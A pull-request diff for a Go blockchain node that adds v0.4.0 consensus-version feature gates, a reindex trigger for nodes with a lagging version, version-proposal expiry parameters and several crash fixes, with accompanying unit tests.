### PR TITLE
fix(tss): keep committee connections warm + reconnect on stale sends

### DIFF
--- a/cmd/vsc-node/main.go
+++ b/cmd/vsc-node/main.go
@@ -94,12 +94,16 @@ func main() {
 	reindexDb := db.NewReindex(vscDb.DbInstance, args.forceReindex, &db.VersionReindex{
 		RunningMajor:     runningVer.Major,
 		RunningConsensus: runningVer.Consensus,
+		// Query the elections collection directly off the (already-connected)
+		// DbInstance rather than via electionDb.GetElectionByHeight: this callback
+		// runs inside reindexDb.Init(), which the aggregate sequences BEFORE the
+		// electionDb plugin Init that binds its mongo handle — using electionDb here
+		// dereferences a nil collection and panics the node on restart.
 		ChainActiveAt: func(blockHeight uint64) (uint64, uint64, bool) {
-			elec, err := electionDb.GetElectionByHeight(blockHeight)
-			if err != nil {
+			v, ok := elections.ChainActiveVersionAt(vscDb.DbInstance, blockHeight)
+			if !ok {
 				return 0, 0, false
 			}
-			v := elections.ResultVersion(elec)
 			return v.Major, v.Consensus, true
 		},
 	})

--- a/cmd/vsc-node/main.go
+++ b/cmd/vsc-node/main.go
@@ -15,6 +15,7 @@ import (
 	blockproducer "vsc-node/modules/block-producer"
 	"vsc-node/modules/common"
 	"vsc-node/modules/common/common_types"
+	"vsc-node/modules/common/consensusversion"
 	systemconfig "vsc-node/modules/common/system-config"
 	"vsc-node/modules/db"
 	"vsc-node/modules/db/vsc"
@@ -79,12 +80,29 @@ func main() {
 
 	dbImpl := db.New(dbConf)
 	vscDb := vsc.New(dbImpl, dbConf)
-	reindexDb := db.NewReindex(vscDb.DbInstance, args.forceReindex)
 	hiveBlocks, err := hive_blocks.New(vscDb)
 	witnessDb := witnesses.New(vscDb)
 	vscBlocks := vscBlocks.New(vscDb)
 	witnessesDb := witnesses.New(vscDb)
 	electionDb := elections.New(vscDb)
+	// Reindex gate: the usual REINDEX_ID/force path PLUS a consensus-version-lag
+	// trigger — if the binary that last processed up to the head was BELOW the
+	// chain-active version there (a version-adoption laggard that diverged locally),
+	// and this binary can handle it, replay history from genesis under the correct
+	// rules. ChainActiveAt reads the on-chain election active at the head.
+	runningVer := consensusversion.RunningVersion()
+	reindexDb := db.NewReindex(vscDb.DbInstance, args.forceReindex, &db.VersionReindex{
+		RunningMajor:     runningVer.Major,
+		RunningConsensus: runningVer.Consensus,
+		ChainActiveAt: func(blockHeight uint64) (uint64, uint64, bool) {
+			elec, err := electionDb.GetElectionByHeight(blockHeight)
+			if err != nil {
+				return 0, 0, false
+			}
+			v := elections.ResultVersion(elec)
+			return v.Major, v.Consensus, true
+		},
+	})
 	contractDb := contracts.New(vscDb)
 	txDb := transactions.New(vscDb)
 	ledgerDbImpl := ledgerDb.New(vscDb)

--- a/lib/dids/bls.go
+++ b/lib/dids/bls.go
@@ -806,7 +806,16 @@ func (b *BlsCircuit) Verify() (bool, []BlsDID, error) {
 
 	// aggregate the pub keys
 	// agg all the pub keys at once
-	pubKey, _ := bls.AggregatePubkeys(includedPubKeys)
+	// F9 fix: the AggregatePubkeys error was previously dropped. A key that
+	// deserialized non-nil but is not a valid group element (e.g. the identity
+	// point) makes this fail and return a nil/invalid pubKey, which then panics
+	// in bls.Verify below — a network-wide halt. The keyset is on-chain election
+	// data (identical across nodes), so failing the whole verify deterministically
+	// here is safe and strictly better than a panic.
+	pubKey, err := bls.AggregatePubkeys(includedPubKeys)
+	if err != nil || pubKey == nil {
+		return false, nil, fmt.Errorf("aggregate pubkeys failed: %w", err)
+	}
 	// aggWorks := aggPub.Aggregate(includedPubKeys, true)
 	// aggPubKey := aggPub.ToAffine()
 

--- a/lib/test_utils/mock_consensus_state.go
+++ b/lib/test_utils/mock_consensus_state.go
@@ -58,17 +58,17 @@ func (m *MockConsensusState) Upsert(_ context.Context, state consensus_state.Cha
 	return nil
 }
 
-func (m *MockConsensusState) SetScheduledActivation(_ context.Context, s *consensus_state.ScheduledActivation) error {
+func (m *MockConsensusState) SetVersionProposals(_ context.Context, props []consensus_state.VersionProposal) error {
 	m.mu.Lock()
 	defer m.mu.Unlock()
-	m.S.ScheduledActivation = s
+	m.S.VersionProposals = props
 	return nil
 }
 
-func (m *MockConsensusState) ClearScheduledActivation(_ context.Context) error {
+func (m *MockConsensusState) SetForcedActivation(_ context.Context, s *consensus_state.VersionProposal) error {
 	m.mu.Lock()
 	defer m.mu.Unlock()
-	m.S.ScheduledActivation = nil
+	m.S.ForcedActivation = s
 	return nil
 }
 
@@ -79,10 +79,10 @@ func (m *MockConsensusState) SetProcessingSuspended(_ context.Context, suspended
 	return nil
 }
 
-func (m *MockConsensusState) SetForcedActivationAndClearSuspension(_ context.Context, s *consensus_state.ScheduledActivation) error {
+func (m *MockConsensusState) SetForcedActivationAndClearSuspension(_ context.Context, s *consensus_state.VersionProposal) error {
 	m.mu.Lock()
 	defer m.mu.Unlock()
-	m.S.ScheduledActivation = s
+	m.S.ForcedActivation = s
 	m.S.ProcessingSuspended = false
 	return nil
 }

--- a/modules/block-producer/blockProducer.go
+++ b/modules/block-producer/blockProducer.go
@@ -694,6 +694,14 @@ func (bp *BlockProducer) HandleBlockMsg(msg p2pMessage) (string, error) {
 		if txRecord == nil {
 			return "", errors.New("invalid transaction")
 		}
+		// F22 fix: Ops[0] previously indexed an empty slice → index-out-of-range
+		// panic (recovered in the pubsub goroutine, so non-fatal, but it aborts
+		// block-msg handling). A tx with zero ops is invalid — reject it cleanly,
+		// the same way a nil txRecord is handled above. (Exposed once F4 made an
+		// unknown-op tx resolve to zero ops instead of a chain-halting nil.)
+		if len(txRecord.Ops) == 0 {
+			return "", errors.New("transaction has no ops")
+		}
 		op := txRecord.Ops[0].Type
 		transactions = append(transactions, vscBlocks.VscBlockTx{
 			Id:   txRecord.Id,

--- a/modules/common/consensusversion/feature_gates.go
+++ b/modules/common/consensusversion/feature_gates.go
@@ -119,3 +119,43 @@ func GovernanceActionsActive(active Version) bool {
 func SafetySlashBurnDelay7dActive(active Version) bool {
 	return Version0_3_0Active(active)
 }
+
+// V0_4_0 is the consensus version line at which the v0.4.0 safety/correctness
+// batch activates. Every consensus-affecting change in v0.4.0 keys off this single
+// version so the network has ONE coordinated activation, driven by the election
+// floor reaching 0.4.0.
+var V0_4_0 = Version{Major: 0, Consensus: 4, NonConsensus: 0}
+
+// Version0_4_0Active reports whether the v0.4.0 batch is in force given the
+// chain-active consensus version. `active` is resolved by the caller from the
+// on-chain election (deterministic, replay-correct). Below the line every v0.4.0
+// rule is inert and behavior stays byte-identical to 0.3.0, so old and new
+// binaries interoperate until the floor reaches 0.4.0.
+func Version0_4_0Active(active Version) bool {
+	return active.MeetsConsensusMin(V0_4_0)
+}
+
+// MinMembersGuardActive reports whether the GV4-3 sub-MinMembers election-reject
+// guard is enforced given the chain-active consensus version: the state engine
+// rejects an incoming election whose new committee has < MinMembers members before
+// persisting it (see TxElectionResult.ExecuteTx), so a degenerate committee can
+// never drive consensus.GenerateSchedule into witnessList[slot % 0] (a divide-by-
+// zero chain halt). Resolve `active` from the version active at the election's
+// submit height (StateEngine.ActiveConsensusVersion(tx.Self.BlockHeight)); below
+// the line the reject is inert so replay of pre-activation history (which on
+// mainnet includes valid 7-member elections) is byte-identical. A sub-MinMembers
+// election is never legitimate, so the guard can only ever reject degenerate input.
+func MinMembersGuardActive(active Version) bool {
+	return Version0_4_0Active(active)
+}
+
+// UnstakeHbdDirectionFixActive reports whether the F14 fix is in force given the
+// chain-active consensus version: an offchain unstake_hbd op builds TxUnstakeHbd
+// (releases stake) instead of the legacy TxStakeHbd (which wrongly STAKED — the
+// 0.3.0 behavior). Resolve `active` from the version active at the op's anchored
+// height (StateEngine.ActiveConsensusVersion(anchoredHeight)); below the line the
+// legacy stake direction is preserved so a full reindex reproduces historical
+// ledger state. The L1 vsc.unstake_hbd path was already correct and is unaffected.
+func UnstakeHbdDirectionFixActive(active Version) bool {
+	return Version0_4_0Active(active)
+}

--- a/modules/common/consensusversion/feature_gates_test.go
+++ b/modules/common/consensusversion/feature_gates_test.go
@@ -45,9 +45,55 @@ func TestV0_3_0Gates(t *testing.T) {
 		}
 	}
 
+	// v0.3.0 features stay active at/above the later 0.4.0 line (MeetsConsensusMin
+	// is monotone), so a 0.4.0-running binary still honors the governance batch.
+	if !GovernanceActionsActive(V0_4_0) || !SafetySlashBurnDelay7dActive(V0_4_0) {
+		t.Errorf("v0.3.0 gates must remain active at the 0.4.0 line")
+	}
+}
+
+// TestV0_4_0Gates pins the v0.4.0 safety/correctness batch activation: every
+// v0.4.0 feature is inert at/below 0.3.0 and active at/above 0.4.0, all keyed off
+// the single V0_4_0 line so the GV4-3 election guard and the F14 unstake_hbd
+// direction fix flip together. non_consensus is ignored.
+func TestV0_4_0Gates(t *testing.T) {
+	below := []Version{
+		{Major: 0, Consensus: 0},
+		{Major: 0, Consensus: 3},
+		{Major: 0, Consensus: 3, NonConsensus: 9}, // 0.3.x is still below the line
+	}
+	atOrAbove := []Version{
+		{Major: 0, Consensus: 4},
+		{Major: 0, Consensus: 4, NonConsensus: 7}, // non_consensus ignored
+		{Major: 0, Consensus: 9},
+	}
+
+	for _, v := range below {
+		if Version0_4_0Active(v) {
+			t.Errorf("Version0_4_0Active(%s) = true, want false (below the line)", v.Format())
+		}
+		if MinMembersGuardActive(v) {
+			t.Errorf("MinMembersGuardActive(%s) = true, want false", v.Format())
+		}
+		if UnstakeHbdDirectionFixActive(v) {
+			t.Errorf("UnstakeHbdDirectionFixActive(%s) = true, want false", v.Format())
+		}
+	}
+	for _, v := range atOrAbove {
+		if !Version0_4_0Active(v) {
+			t.Errorf("Version0_4_0Active(%s) = false, want true (at/above the line)", v.Format())
+		}
+		if !MinMembersGuardActive(v) {
+			t.Errorf("MinMembersGuardActive(%s) = false, want true", v.Format())
+		}
+		if !UnstakeHbdDirectionFixActive(v) {
+			t.Errorf("UnstakeHbdDirectionFixActive(%s) = false, want true", v.Format())
+		}
+	}
+
 	// The shipped binary must run the version it implements, so the floor can rise.
-	if RunningVersion().Cmp(V0_3_0) != 0 {
-		t.Errorf("RunningVersion() = %s, want %s (bump in the same commit as the v0.3.0 gates)",
-			RunningVersion().Format(), V0_3_0.Format())
+	if RunningVersion().Cmp(V0_4_0) != 0 {
+		t.Errorf("RunningVersion() = %s, want %s (bump in the same commit as the v0.4.0 gates)",
+			RunningVersion().Format(), V0_4_0.Format())
 	}
 }

--- a/modules/common/consensusversion/version.go
+++ b/modules/common/consensusversion/version.go
@@ -45,9 +45,20 @@ import (
 //     which backs (a) by giving witnesses time to gather a slash_restore quorum before
 //     the residual matures. Until 0.3.0 is chain-active the ops are ignored and the
 //     pending window stays 3 days, so old and new binaries interoperate until activation.
+//   - 0.4.0 — the Consensus 3→4 bump gates a safety/correctness batch, all activated
+//     together when the election floor reaches 0.4.0 (consensusversion.V0_4_0):
+//     (a) GV4-3 sub-MinMembers election reject (MinMembersGuardActive) — the state
+//     engine rejects an incoming election whose new committee is below MinMembers
+//     before persisting it, so a degenerate (e.g. empty) committee can never drive
+//     consensus.GenerateSchedule into a divide-by-zero chain halt; below the line the
+//     reject is inert so replay of pre-activation history is byte-identical;
+//     (b) F14 offchain unstake_hbd direction fix (UnstakeHbdDirectionFixActive) — an
+//     offchain unstake_hbd builds TxUnstakeHbd (releases stake) instead of TxStakeHbd
+//     (the 0.3.0 behavior that wrongly STAKED); below the line the legacy stake
+//     direction is preserved so old and new binaries interoperate until activation.
 const (
 	currentMajor        uint64 = 0
-	currentConsensus    uint64 = 3
+	currentConsensus    uint64 = 4
 	currentNonConsensus uint64 = 0
 )
 

--- a/modules/common/consensusversion/version_test.go
+++ b/modules/common/consensusversion/version_test.go
@@ -44,7 +44,7 @@ func TestMaxComponentwise(t *testing.T) {
 // pinned current triple. Update this pin in the SAME commit that bumps the constants in
 // version.go.
 func TestRunningVersionIsSourcePinned(t *testing.T) {
-	want := Version{Major: 0, Consensus: 3, NonConsensus: 0}
+	want := Version{Major: 0, Consensus: 4, NonConsensus: 0}
 	if got := RunningVersion(); got != want {
 		t.Fatalf("running version = %+v, want %+v (source constants in version.go)", got, want)
 	}

--- a/modules/common/params/params.go
+++ b/modules/common/params/params.go
@@ -335,11 +335,33 @@ type ConsensusParams struct {
 	// decision changes ledger state, so this is a fixed network-wide constant
 	// every node shares. 0 falls back to DefaultGovernanceProposalExpiryBlocks.
 	GovernanceProposalExpiryBlocks uint64 `json:"governanceProposalExpiryBlocks,omitempty"`
+
+	// VersionProposalExpiryEpochs is the hard deadline (in election epochs) for a
+	// vsc.propose_consensus_version candidate: a proposal that has not been adopted
+	// by creationEpoch+this is pruned at election build. Long enough to schedule a
+	// rollout in advance and let the fleet upgrade (~2 weeks at 6h/epoch), short
+	// enough that stale candidates don't linger. 0 falls back to
+	// DefaultVersionProposalExpiryEpochs.
+	VersionProposalExpiryEpochs uint64 `json:"versionProposalExpiryEpochs,omitempty"`
+
+	// VersionProposalFastFailEpochs is the no-traction window: a candidate older
+	// than this that has attracted no stake beyond its own proposer is pruned early
+	// (kills junk/poison well before the hard deadline). 0 falls back to
+	// DefaultVersionProposalFastFailEpochs.
+	VersionProposalFastFailEpochs uint64 `json:"versionProposalFastFailEpochs,omitempty"`
 }
 
 // DefaultGovernanceProposalExpiryBlocks is the fallback proposal voting window
 // (~3 days at 3s/block) used when a network pins no explicit value.
 const DefaultGovernanceProposalExpiryBlocks uint64 = 3 * 28800
+
+// DefaultVersionProposalExpiryEpochs (~2 weeks at 6h/epoch) is the fallback
+// hard deadline for a consensus-version proposal.
+const DefaultVersionProposalExpiryEpochs uint64 = 56
+
+// DefaultVersionProposalFastFailEpochs (~2 days at 6h/epoch) is the fallback
+// no-traction window after which a candidate with no stake beyond its proposer is pruned.
+const DefaultVersionProposalFastFailEpochs uint64 = 8
 
 const (
 	// SafetySlashBurnDelay3dBlocks is the original ~3-day pending-burn window
@@ -438,6 +460,24 @@ func (cp ConsensusParams) GovernanceProposalExpiry() uint64 {
 		return DefaultGovernanceProposalExpiryBlocks
 	}
 	return cp.GovernanceProposalExpiryBlocks
+}
+
+// VersionProposalExpiry returns the consensus-version-proposal hard deadline in
+// epochs, falling back to DefaultVersionProposalExpiryEpochs when unset (0).
+func (cp ConsensusParams) VersionProposalExpiry() uint64 {
+	if cp.VersionProposalExpiryEpochs == 0 {
+		return DefaultVersionProposalExpiryEpochs
+	}
+	return cp.VersionProposalExpiryEpochs
+}
+
+// VersionProposalFastFail returns the no-traction window in epochs, falling back
+// to DefaultVersionProposalFastFailEpochs when unset (0).
+func (cp ConsensusParams) VersionProposalFastFail() uint64 {
+	if cp.VersionProposalFastFailEpochs == 0 {
+		return DefaultVersionProposalFastFailEpochs
+	}
+	return cp.VersionProposalFastFailEpochs
 }
 
 // BondInclusionActive reports whether the bond inclusion-window maturity gate

--- a/modules/common/system-config/system-config.go
+++ b/modules/common/system-config/system-config.go
@@ -371,6 +371,10 @@ func DevnetConfig() SystemConfig {
 			ElectionDupeFixEpoch:          0,
 			ConsensusVersionActivationNum: 4,
 			ConsensusVersionActivationDen: 5,
+			// Short version-proposal windows so devnet integration tests exercise
+			// adoption + expiry without waiting weeks of (fast) epochs.
+			VersionProposalExpiryEpochs:   6,
+			VersionProposalFastFailEpochs: 3,
 			// Ephemeral network (fresh per run): pin the consensus-version floor to
 			// 0.3.0 from epoch 1 so the whole v0.2.0 AND v0.3.0 batches are active
 			// from genesis and exercised by devnet/regression tests (the governance

--- a/modules/db/reindex.go
+++ b/modules/db/reindex.go
@@ -2,6 +2,7 @@ package db
 
 import (
 	"context"
+	"fmt"
 	"slices"
 	"vsc-node/lib/vsclog"
 
@@ -17,43 +18,86 @@ var IMMUTABLE_COLLECTIONS = []string{
 	"hive_blocks",
 }
 
+// VersionReindex configures the consensus-version-lag full-reindex trigger.
+//
+// A node that ran a binary BELOW the chain-active consensus version while it
+// processed blocks diverges locally (it applies stale rules to blocks the network
+// adopted a newer version for — exactly the lagging-behind-the-80%-adoption-window
+// case). Upgrading the binary does NOT heal the already-written rows; the history
+// must be replayed under the correct rules. As a temporary measure (until a partial
+// reindex exists) this triggers a FULL reindex (drop derived state, replay from
+// genesis) when the previous run's recorded version could not handle the chain-active
+// version at the head and THIS binary can.
+//
+// Nil disables the trigger. The chain-active lookup is injected as a callback so this
+// generic db package stays free of election/consensus-version imports.
+type VersionReindex struct {
+	RunningMajor     uint64
+	RunningConsensus uint64
+	// ChainActiveAt returns the chain-active coordinated version (major.consensus) at
+	// a block height, sourced from the on-chain election. ok=false when unknown
+	// (no election below the height / pre-genesis) — the trigger is then skipped.
+	ChainActiveAt func(blockHeight uint64) (major, consensus uint64, ok bool)
+}
+
 type DbReindex struct {
 	*DbInstance
-	force bool
+	force    bool
+	verCheck *VersionReindex
 }
 
 func (dbr *DbReindex) Init() error {
 	ctx := context.Background()
 	col := dbr.Collection("hive_blocks")
-	findResult := col.FindOne(ctx, bson.M{
-		"type": "metadata",
-	})
 	result := SearchResult{}
-	err := findResult.Decode(&result)
+	_ = col.FindOne(ctx, bson.M{"type": "metadata"}).Decode(&result)
 
 	var indexId uint64
-	if err != nil || result.ReindexId == nil {
-		indexId = 0
-	} else {
+	if result.ReindexId != nil {
 		indexId = *result.ReindexId
-		log.Verbose("reindex metadata", "reindex_id", indexId)
 	}
 
-	if indexId != uint64(REINDEX_ID) || dbr.force {
-		if dbr.force {
-			log.Info("force reindexing database", "from", indexId, "to", REINDEX_ID)
-		} else {
-			log.Info("reindexing database", "from", indexId, "to", REINDEX_ID)
-		}
-		cols, _ := dbr.ListCollectionNames(ctx, bson.M{})
+	shouldReindex := indexId != uint64(REINDEX_ID) || dbr.force
+	reason := ""
+	switch {
+	case dbr.force:
+		reason = "force flag"
+	case indexId != uint64(REINDEX_ID):
+		reason = fmt.Sprintf("reindex_id %d != %d", indexId, REINDEX_ID)
+	}
 
-		for _, name := range cols {
-			if !slices.Contains(IMMUTABLE_COLLECTIONS, name) {
-				col := dbr.Collection(name)
-				col.Drop(ctx)
+	// Consensus-version-lag trigger. Skipped on the first boot that records a version
+	// (ProcessedUnderConsensus nil) — we assume the existing DB is consistent with the
+	// current binary rather than forcing an unnecessary genesis replay; the trigger
+	// then arms for any FUTURE lag.
+	if dbr.verCheck != nil && dbr.verCheck.ChainActiveAt != nil && result.ProcessedUnderConsensus != nil {
+		var lastBlock uint64
+		if result.LastProcessedBlock != nil {
+			lastBlock = *result.LastProcessedBlock
+		}
+		chMajor, chCons, ok := dbr.verCheck.ChainActiveAt(lastBlock)
+		if ok {
+			procMajor := uint64(0)
+			if result.ProcessedUnderMajor != nil {
+				procMajor = *result.ProcessedUnderMajor
+			}
+			procCons := *result.ProcessedUnderConsensus
+			if versionLagNeedsReindex(dbr.verCheck.RunningMajor, dbr.verCheck.RunningConsensus, chMajor, chCons, procMajor, procCons) {
+				shouldReindex = true
+				reason = fmt.Sprintf("consensus-version lag: last processed under %d.%d but chain-active was %d.%d at block %d (this binary %d.%d)",
+					procMajor, procCons, chMajor, chCons, lastBlock, dbr.verCheck.RunningMajor, dbr.verCheck.RunningConsensus)
 			}
 		}
+	}
 
+	if shouldReindex {
+		log.Info("reindexing database (full replay from genesis)", "reason", reason, "from", indexId, "to", REINDEX_ID)
+		cols, _ := dbr.ListCollectionNames(ctx, bson.M{})
+		for _, name := range cols {
+			if !slices.Contains(IMMUTABLE_COLLECTIONS, name) {
+				dbr.Collection(name).Drop(ctx)
+			}
+		}
 		col.FindOneAndUpdate(ctx, bson.M{
 			"type": "metadata",
 		}, bson.M{
@@ -63,13 +107,41 @@ func (dbr *DbReindex) Init() error {
 			},
 		}, options.FindOneAndUpdate().SetUpsert(true))
 	}
+
+	// Record THIS run's binary version so the next start can detect a future version
+	// lag. Written whether or not we reindexed: after a wipe it tags the upcoming
+	// genesis replay; on a normal restart it tags forward processing.
+	if dbr.verCheck != nil {
+		col.FindOneAndUpdate(ctx, bson.M{
+			"type": "metadata",
+		}, bson.M{
+			"$set": bson.M{
+				"processed_under_major":     dbr.verCheck.RunningMajor,
+				"processed_under_consensus": dbr.verCheck.RunningConsensus,
+			},
+		}, options.FindOneAndUpdate().SetUpsert(true))
+	}
 	return nil
 }
 
-func NewReindex(db *DbInstance, force bool) *DbReindex {
-	return &DbReindex{db, force}
+// versionLagNeedsReindex reports whether a full reindex is required because the
+// version that last processed up to the head (proc*) could NOT handle the chain-active
+// version there (ch*) — the node lagged behind a version adoption and diverged —
+// while THIS binary (running*) can. Componentwise on the coordinated major.consensus
+// (same MeetsConsensusMin semantics the election floor uses).
+func versionLagNeedsReindex(runningMajor, runningCons, chMajor, chCons, procMajor, procCons uint64) bool {
+	runningMeets := runningMajor >= chMajor && runningCons >= chCons
+	processedMeets := procMajor >= chMajor && procCons >= chCons
+	return runningMeets && !processedMeets
+}
+
+func NewReindex(db *DbInstance, force bool, verCheck *VersionReindex) *DbReindex {
+	return &DbReindex{db, force, verCheck}
 }
 
 type SearchResult struct {
-	ReindexId *uint64 `json:"reindex_id,omitempty" bson:"reindex_id,omitempty"`
+	ReindexId               *uint64 `json:"reindex_id,omitempty" bson:"reindex_id,omitempty"`
+	LastProcessedBlock      *uint64 `json:"last_processed_block,omitempty" bson:"last_processed_block,omitempty"`
+	ProcessedUnderMajor     *uint64 `json:"processed_under_major,omitempty" bson:"processed_under_major,omitempty"`
+	ProcessedUnderConsensus *uint64 `json:"processed_under_consensus,omitempty" bson:"processed_under_consensus,omitempty"`
 }

--- a/modules/db/reindex_test.go
+++ b/modules/db/reindex_test.go
@@ -1,0 +1,37 @@
+package db
+
+import "testing"
+
+// TestVersionLagNeedsReindex pins the consensus-version-lag full-reindex decision:
+// reindex iff the previous run's binary could NOT handle the chain-active version at
+// the head but THIS binary can (the laggard-upgraded case).
+func TestVersionLagNeedsReindex(t *testing.T) {
+	cases := []struct {
+		name                                              string
+		runMaj, runCons, chMaj, chCons, procMaj, procCons uint64
+		want                                              bool
+	}{
+		// Node has always been current with the chain → no reindex.
+		{"current", 0, 3, 0, 3, 0, 3, false},
+		// Laggard still on the OLD binary (below chain): can't fix under it yet → no reindex.
+		{"laggard not yet upgraded", 0, 2, 0, 3, 0, 2, false},
+		// Laggard upgraded: prev run was 0.2 < chain 0.3, this binary is 0.3 → reindex.
+		{"laggard upgraded", 0, 3, 0, 3, 0, 2, true},
+		// Big lag, upgraded all the way: prev 0.2, chain 0.4, now 0.4 → reindex.
+		{"laggard upgraded over two versions", 0, 4, 0, 4, 0, 2, true},
+		// Node running AHEAD of the chain the whole time (e.g. 0.4 binary, chain 0.3) →
+		// it applied 0.3 rules via gates, never diverged → no reindex.
+		{"ahead of chain", 0, 4, 0, 3, 0, 4, false},
+		// Upgraded but the chain never moved past what the prev run already handled → no reindex.
+		{"upgraded but no missed adoption", 0, 4, 0, 3, 0, 3, false},
+		// Prev run could handle chain exactly (== ), this binary higher → no reindex.
+		{"prev exactly met chain", 0, 4, 0, 3, 0, 3, false},
+	}
+	for _, c := range cases {
+		got := versionLagNeedsReindex(c.runMaj, c.runCons, c.chMaj, c.chCons, c.procMaj, c.procCons)
+		if got != c.want {
+			t.Errorf("%s: versionLagNeedsReindex(run=%d.%d chain=%d.%d proc=%d.%d) = %v, want %v",
+				c.name, c.runMaj, c.runCons, c.chMaj, c.chCons, c.procMaj, c.procCons, got, c.want)
+		}
+	}
+}

--- a/modules/db/vsc/consensus_state/consensus_state.go
+++ b/modules/db/vsc/consensus_state/consensus_state.go
@@ -38,17 +38,22 @@ func (c *consensusState) Stop() error {
 	return nil
 }
 
-// ConsensusState is chain-global recovery flags plus the pending scheduled version switch.
+// ConsensusState is chain-global recovery flags plus the bounded set of pending
+// consensus-version proposals (and the recovery-multisig forced override).
 type ConsensusState interface {
 	a.Plugin
 	Get(ctx context.Context) (ChainConsensusState, error)
 	Upsert(ctx context.Context, state ChainConsensusState) error
-	SetScheduledActivation(ctx context.Context, s *ScheduledActivation) error
-	ClearScheduledActivation(ctx context.Context) error
+	// SetVersionProposals replaces the whole normal-proposal set. Callers read the
+	// cached set, upsert-by-proposer or prune in memory, then write the result back
+	// (the state engine processes blocks serially, so read-modify-write is safe).
+	SetVersionProposals(ctx context.Context, props []VersionProposal) error
+	// SetForcedActivation sets (or, with nil, clears) the recovery forced override.
+	SetForcedActivation(ctx context.Context, s *VersionProposal) error
 	SetProcessingSuspended(ctx context.Context, suspended bool) error
-	// SetForcedActivationAndClearSuspension is the recovery path: schedule a Forced
+	// SetForcedActivationAndClearSuspension is the recovery path: install a Forced
 	// switch and lift the processing halt in one update.
-	SetForcedActivationAndClearSuspension(ctx context.Context, s *ScheduledActivation) error
+	SetForcedActivationAndClearSuspension(ctx context.Context, s *VersionProposal) error
 }
 
 func (c *consensusState) Get(ctx context.Context) (ChainConsensusState, error) {
@@ -67,7 +72,8 @@ func defaultState() ChainConsensusState {
 	return ChainConsensusState{
 		ID:                  singletonID,
 		ProcessingSuspended: false,
-		ScheduledActivation: nil,
+		ForcedActivation:    nil,
+		VersionProposals:    nil,
 	}
 }
 
@@ -77,19 +83,24 @@ func (c *consensusState) Upsert(ctx context.Context, state ChainConsensusState) 
 	return err
 }
 
-func (c *consensusState) SetScheduledActivation(ctx context.Context, s *ScheduledActivation) error {
+func (c *consensusState) SetVersionProposals(ctx context.Context, props []VersionProposal) error {
 	_, err := c.Collection.UpdateOne(ctx,
 		bson.M{"_id": singletonID},
-		bson.M{"$set": bson.M{"scheduled_activation": s}},
+		bson.M{"$set": bson.M{"version_proposals": props}},
 		options.Update().SetUpsert(true),
 	)
 	return err
 }
 
-func (c *consensusState) ClearScheduledActivation(ctx context.Context) error {
+// SetForcedActivation installs (s != nil) or clears (s == nil) the recovery override.
+func (c *consensusState) SetForcedActivation(ctx context.Context, s *VersionProposal) error {
+	update := bson.M{"$set": bson.M{"scheduled_activation": s}}
+	if s == nil {
+		update = bson.M{"$unset": bson.M{"scheduled_activation": ""}}
+	}
 	_, err := c.Collection.UpdateOne(ctx,
 		bson.M{"_id": singletonID},
-		bson.M{"$unset": bson.M{"scheduled_activation": ""}},
+		update,
 		options.Update().SetUpsert(true),
 	)
 	return err
@@ -104,7 +115,7 @@ func (c *consensusState) SetProcessingSuspended(ctx context.Context, suspended b
 	return err
 }
 
-func (c *consensusState) SetForcedActivationAndClearSuspension(ctx context.Context, s *ScheduledActivation) error {
+func (c *consensusState) SetForcedActivationAndClearSuspension(ctx context.Context, s *VersionProposal) error {
 	_, err := c.Collection.UpdateOne(ctx,
 		bson.M{"_id": singletonID},
 		bson.M{

--- a/modules/db/vsc/consensus_state/schema.go
+++ b/modules/db/vsc/consensus_state/schema.go
@@ -4,29 +4,43 @@ import "vsc-node/modules/common/consensusversion"
 
 const singletonID = "singleton"
 
-// ChainConsensusState is persisted chain-global recovery state plus the pending
-// epoch-scheduled version switch. The *active* consensus version is NOT stored here —
-// it is a pure function of the on-chain election (elections.ResultVersion). This record
-// only holds (a) the recovery halt flag and (b) the scheduled switch awaiting its
-// activation epoch + stake-readiness guard, both consumed deterministically at election build.
+// ChainConsensusState is persisted chain-global recovery state plus the bounded set
+// of pending consensus-version proposals. The *active* consensus version is NOT stored
+// here — it is a pure function of the on-chain election (elections.ResultVersion). This
+// record only holds (a) the recovery halt flag, (b) the recovery-multisig forced override,
+// and (c) the normal candidate proposals awaiting their activation epoch + stake-readiness
+// guard, all consumed deterministically at election build.
 type ChainConsensusState struct {
 	ID string `bson:"_id"`
 
 	// ProcessingSuspended blocks normal vsc custom_json processing until cleared by recovery_require_version.
 	ProcessingSuspended bool `bson:"processing_suspended"`
 
-	// ScheduledActivation is the pending epoch-scheduled version switch (set by
-	// vsc.propose_consensus_version, or Forced by recovery_require_version). It is
-	// resolved into the election at its activation epoch once the stake-readiness guard passes.
-	ScheduledActivation *ScheduledActivation `bson:"scheduled_activation,omitempty"`
+	// ForcedActivation is the recovery-multisig override (vsc.recovery_require_version):
+	// at most one, it bypasses the stake-readiness guard and takes precedence over every
+	// normal proposal. The bson key stays "scheduled_activation" for back-compat with any
+	// pre-existing on-disk doc.
+	ForcedActivation *VersionProposal `bson:"scheduled_activation,omitempty"`
+
+	// VersionProposals is the bounded set of normal candidate version switches (set by
+	// vsc.propose_consensus_version), one slot per proposer. The election proposer adopts
+	// the highest target the committee is stake-ready for; the election_result handler
+	// garbage-collects adopted / expired / no-traction entries.
+	VersionProposals []VersionProposal `bson:"version_proposals,omitempty"`
 }
 
-// ScheduledActivation captures a target major.consensus to switch to at ActivationEpoch.
-type ScheduledActivation struct {
+// VersionProposal is a single candidate consensus-version switch. Provenance fields
+// (Proposer/TxId/BlockHeight) make reads height-addressable (honored only when
+// BlockHeight < query height) so every signer resolves the identical floor → CID.
+type VersionProposal struct {
 	TargetMajor     uint64 `bson:"target_major"`
 	TargetConsensus uint64 `bson:"target_consensus"`
 	// ActivationEpoch is the election epoch at/after which the switch may activate.
 	ActivationEpoch uint64 `bson:"activation_epoch"`
+	// CreationEpoch is the epoch of the proposing block — anchors the fast-fail window.
+	CreationEpoch uint64 `bson:"creation_epoch,omitempty"`
+	// ExpiryEpoch is the hard deadline; the proposal is pruned once an election reaches it.
+	ExpiryEpoch uint64 `bson:"expiry_epoch,omitempty"`
 	// Forced skips the stake-readiness guard (recovery path only).
 	Forced bool `bson:"forced"`
 	// Proposer/TxId/BlockHeight record provenance; BlockHeight makes the read
@@ -37,7 +51,7 @@ type ScheduledActivation struct {
 }
 
 // Target returns the coordinated target (non_consensus is not coordinated).
-func (s ScheduledActivation) Target() consensusversion.Version {
+func (s VersionProposal) Target() consensusversion.Version {
 	return consensusversion.Version{
 		Major:     s.TargetMajor,
 		Consensus: s.TargetConsensus,

--- a/modules/db/vsc/consensus_state/schema.go
+++ b/modules/db/vsc/consensus_state/schema.go
